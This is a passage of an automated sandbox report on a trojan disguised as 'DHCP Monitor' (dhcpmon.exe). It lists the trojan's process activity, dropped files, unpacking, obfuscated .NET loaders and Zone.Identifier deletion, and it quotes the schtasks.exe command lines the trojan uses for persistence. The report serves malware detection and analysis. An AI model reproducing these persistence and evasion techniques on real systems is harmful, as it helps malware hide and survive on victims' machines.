        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_0040A2A511_2_0040A2A5
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_026623A011_2_026623A0
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_02662FA811_2_02662FA8
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_0266306F11_2_0266306F
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_0040A2A511_1_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF75BE012_2_6FF75BE0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 12_2_6FF75BEF12_2_6FF75BEF
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_0040A2A514_2_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_0257385014_2_02573850
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_025723A014_2_025723A0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_02572FA814_2_02572FA8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_0257306F14_2_0257306F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_0040A2A514_1_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF85BEF21_2_6FF85BEF
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_6FF85BE021_2_6FF85BE0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_0040A2A523_2_0040A2A5
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_049E2FA823_2_049E2FA8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_049E23A023_2_049E23A0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_049E385023_2_049E3850
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_049E306F23_2_049E306F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_0040A2A523_1_0040A2A5
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: String function: 00402A29 appears 52 times
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: String function: 00401ED0 appears 69 times
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: String function: 00405B98 appears 38 times
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: String function: 0040569E appears 54 times
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 00401ED0 appears 92 times
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 004056B5 appears 32 times
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: String function: 0040569E appears 72 times
        Source: RHK098760045678009000.exe, 00000000.00000003.259552360.000000000F33F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RHK098760045678009000.exe
        Source: RHK098760045678009000.exe, 00000008.00000003.278073126.000000000F32F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RHK098760045678009000.exe
        Source: RHK098760045678009000.exe, 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs RHK098760045678009000.exe
        Source: RHK098760045678009000.exe, 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs RHK098760045678009000.exe
        Source: RHK098760045678009000.exe, 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs RHK098760045678009000.exe
        Source: RHK098760045678009000.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: dhcpmon.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: RHK098760045678009000.exeVirustotal: Detection: 29%
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile read: C:\Users\user\Desktop\RHK098760045678009000.exeJump to behavior
        Source: RHK098760045678009000.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe 'C:\Users\user\Desktop\RHK098760045678009000.exe'
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe 'C:\Users\user\Desktop\RHK098760045678009000.exe'
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe C:\Users\user\Desktop\RHK098760045678009000.exe 0
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpC322.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe C:\Users\user\Desktop\RHK098760045678009000.exe 0
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe 'C:\Users\user\Desktop\RHK098760045678009000.exe' Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpC322.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe C:\Users\user\Desktop\RHK098760045678009000.exe 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9AJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsg3432.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@18/19@0/2
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404292
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: RHK098760045678009000.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1388:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{319d0527-f6c8-4b20-86a3-4c642aa02ef8}
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,11_2_00401489
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: Binary string: wntdll.pdbUGP source: RHK098760045678009000.exe, 00000000.00000003.259694441.000000000F090000.00000004.00000001.sdmp, RHK098760045678009000.exe, 00000008.00000003.279990371.000000000F080000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.295121161.000000000F0A0000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000003.309071535.000000000F230000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: RHK098760045678009000.exe, 00000000.00000003.259694441.000000000F090000.00000004.00000001.sdmp, RHK098760045678009000.exe, 00000008.00000003.279990371.000000000F080000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.295121161.000000000F0A0000.00000004.00000001.sdmp, dhcpmon.exe, 00000015.00000003.309071535.000000000F230000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeUnpacked PE file: 11.2.RHK098760045678009000.exe.400000.1.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 14.2.dhcpmon.exe.400000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 23.2.dhcpmon.exe.400000.1.unpack
        Detected unpacking (changes PE section rights)Show sources
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeUnpacked PE file: 11.2.RHK098760045678009000.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 14.2.dhcpmon.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 23.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
        .NET source code contains potential unpackerShow sources
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 1_1_00401F16 push ecx; ret 1_1_00401F29
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00401F16 push ecx; ret 11_2_00401F29
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_1_00401F16 push ecx; ret 11_1_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_00401F16 push ecx; ret 14_2_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_2_02588593 push ebp; retn 0000h14_2_025885A4
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_00401F16 push ecx; ret 14_1_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_00401F16 push ecx; ret 23_2_00401F29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_00401F16 push ecx; ret 23_1_00401F29
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 11.2.RHK098760045678009000.exe.25f0000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 14.2.dhcpmon.exe.24f0000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 23.2.dhcpmon.exe.49a0000.8.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nsf6352.tmp\fbnwl.dllJump to dropped file
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3472.tmp\fbnwl.dllJump to dropped file
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nsv8A14.tmp\fbnwl.dllJump to dropped file
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile created: C:\Users\user\AppData\Local\Temp\nsv5920.tmp\fbnwl.dllJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeFile opened: C:\Users\user\Desktop\RHK098760045678009000.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
